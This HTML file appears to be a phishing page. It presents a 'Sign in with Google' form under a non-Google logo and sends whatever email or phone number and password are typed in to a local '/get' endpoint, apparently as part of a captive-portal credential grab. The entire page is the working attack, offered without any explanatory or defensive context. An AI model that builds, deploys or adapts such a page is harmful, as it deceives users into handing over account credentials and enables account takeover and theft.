<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #1a2d4d;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #1a2d4d;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #1a2d4d;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
}

.submit-btn:hover {
  background: #1a2d4d;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="500.000000pt" height="100.000000pt" viewBox="0 0 1441.000000 361.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,361.000000) scale(0.100000,-0.100000)"
fill="#1a2d4d" stroke="none">
<path d="M2252 2754 c-101 -18 -161 -39 -269 -91 -259 -127 -452 -375 -519
-668 -29 -123 -25 -330 9 -457 155 -585 779 -892 1340 -658 156 65 322 200
416 339 210 309 235 685 68 1016 -191 381 -625 596 -1045 519z m421 -78 c324
-96 561 -339 648 -666 32 -119 32 -338 1 -453 -46 -168 -136 -320 -259 -438
-169 -163 -362 -246 -598 -256 -207 -9 -377 37 -543 146 -190 127 -320 302
-388 527 -24 80 -27 105 -27 244 0 180 16 258 83 399 52 109 111 190 196 272
112 106 230 176 371 219 112 34 159 39 298 35 103 -2 148 -9 218 -29z"/>
<path d="M2631 2022 c-54 -7 -55 -8 -89 -66 -95 -162 -250 -237 -393 -191 -61
20 -229 106 -229 117 0 16 31 7 121 -32 51 -23 99 -38 107 -35 9 3 12 9 6 14
-5 5 -93 47 -196 94 -174 79 -188 84 -208 70 -19 -14 -26 -13 -72 6 -62 26
-68 26 -68 4 0 -13 36 -36 123 -80 67 -34 205 -116 307 -183 102 -67 244 -150
315 -185 132 -66 349 -144 463 -166 l63 -13 32 32 32 32 -50 0 c-126 0 -319
75 -415 160 -43 38 -44 40 -26 55 34 26 171 74 248 86 43 7 120 9 189 6 104
-5 119 -4 133 12 16 17 14 19 -30 25 -26 3 -115 6 -198 6 l-151 1 24 19 c28
24 109 26 290 9 107 -10 115 -9 133 9 19 19 18 19 -82 31 -55 6 -144 11 -198
11 -91 0 -95 1 -79 17 14 14 34 16 121 14 58 -1 146 -8 196 -15 83 -11 91 -11
106 6 14 14 14 18 3 22 -23 8 -177 25 -286 32 -84 6 -100 9 -96 22 5 13 24 14
122 8 64 -3 158 -12 210 -20 85 -13 97 -13 119 2 l24 16 -22 8 c-74 28 -478
54 -599 40z"/>
<path d="M7010 2444 c-151 -41 -240 -160 -240 -322 l0 -52 -70 0 -70 0 0 -115
0 -115 70 0 70 0 0 -355 0 -355 140 0 140 0 0 355 0 355 105 0 105 0 0 115 0
115 -105 0 -105 0 0 35 c0 82 42 115 145 115 l65 0 0 114 c0 109 -1 114 -22
120 -41 11 -172 5 -228 -10z"/>
<path d="M4720 1785 l0 -655 435 0 435 0 0 130 0 130 -285 0 -285 0 0 525 0
525 -150 0 -150 0 0 -655z"/>
<path d="M8060 1785 l0 -655 140 0 140 0 0 298 c0 270 2 301 19 339 28 60 83
86 168 81 72 -5 108 -26 135 -79 16 -30 18 -68 18 -336 l0 -303 141 0 140 0
-3 358 c-3 318 -5 362 -22 407 -52 140 -155 205 -326 205 -103 0 -171 -22
-226 -72 l-44 -41 0 227 0 226 -140 0 -140 0 0 -655z"/>
<path d="M7470 2210 l0 -140 -70 0 -71 0 3 -112 3 -113 70 -5 70 -5 0 -235 c0
-198 3 -243 18 -286 48 -140 195 -216 383 -200 42 3 80 8 85 12 5 3 9 54 9
115 l0 109 -65 0 c-75 0 -116 17 -133 55 -8 17 -12 93 -12 230 l0 205 105 0
105 0 0 115 0 115 -105 0 -105 0 0 140 0 140 -145 0 -145 0 0 -140z"/>
<path d="M9350 2082 c-147 -39 -216 -110 -243 -249 l-6 -33 137 0 137 0 13 29
c17 39 63 56 148 55 110 -2 165 -46 136 -109 -14 -30 -50 -40 -205 -55 -315
-31 -431 -128 -415 -349 12 -159 113 -253 290 -268 125 -11 231 23 314 99 l44
41 0 -57 0 -56 131 0 131 0 -4 353 c-4 291 -7 361 -21 402 -30 92 -86 148
-186 186 -79 31 -306 37 -401 11z m337 -583 c-14 -119 -96 -179 -243 -179 -46
0 -68 5 -87 20 -53 42 -43 125 19 155 19 9 90 24 157 35 176 26 161 29 154
-31z"/>
<path d="M10493 2086 c-55 -18 -107 -51 -132 -84 l-20 -27 -1 48 0 47 -135 0
-135 0 0 -470 0 -470 139 0 139 0 4 303 c3 281 4 304 23 336 31 53 67 74 133
79 77 5 143 -22 169 -70 16 -29 18 -66 21 -340 l3 -308 140 0 141 0 -4 353
c-4 339 -5 354 -28 417 -49 134 -160 201 -334 199 -44 0 -100 -6 -123 -13z"/>
<path d="M11347 2084 c-111 -27 -183 -79 -224 -162 -23 -48 -28 -70 -28 -137
0 -184 97 -261 379 -300 133 -18 170 -37 174 -86 5 -58 -22 -73 -133 -77 -110
-4 -149 10 -171 64 l-14 34 -137 0 -136 0 6 -54 c6 -64 33 -120 79 -162 68
-65 153 -92 313 -101 192 -10 333 31 412 121 73 83 90 226 39 330 -46 94 -143
141 -354 170 -60 9 -121 20 -136 26 -53 20 -53 95 1 119 32 15 142 14 173 -2
14 -7 32 -26 40 -42 l15 -30 133 3 132 3 0 24 c0 44 -40 132 -77 170 -43 44
-117 81 -193 95 -73 14 -224 11 -293 -6z"/>
<path d="M12310 2082 c-147 -39 -220 -114 -244 -249 l-5 -33 138 0 139 0 6 25
c10 39 59 59 148 59 55 0 83 -5 102 -18 63 -41 57 -107 -11 -125 -21 -5 -91
-15 -157 -21 -182 -18 -265 -45 -340 -111 -69 -60 -95 -200 -60 -318 20 -69
89 -141 159 -165 105 -36 259 -30 345 14 19 10 56 37 83 60 l47 42 0 -56 0
-56 125 0 125 0 0 353 c0 383 -4 418 -55 487 -33 44 -95 86 -159 106 -78 25
-303 29 -386 6z m332 -586 c-3 -63 -32 -109 -89 -143 -37 -22 -62 -28 -129
-31 -82 -4 -84 -4 -114 26 -48 49 -36 117 27 147 32 15 261 55 293 51 11 -1
14 -13 12 -50z"/>
<path d="M5650 1753 c0 -408 13 -477 105 -568 59 -59 126 -80 255 -80 95 0
110 3 163 28 32 16 67 42 79 58 29 39 37 37 35 -13 l-1 -43 132 -3 132 -3 0
471 0 470 -140 0 -140 0 0 -282 c0 -175 -4 -298 -11 -323 -42 -152 -280 -152
-318 -1 -7 28 -11 152 -11 325 l0 281 -140 0 -140 0 0 -317z"/>
</g>
</svg>
  </div>

  <div class="form-container">

    <center><h1>Sign in with <b>Google</b></h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue</button>

    </form>

  </div>

</div>
</body>
</html>
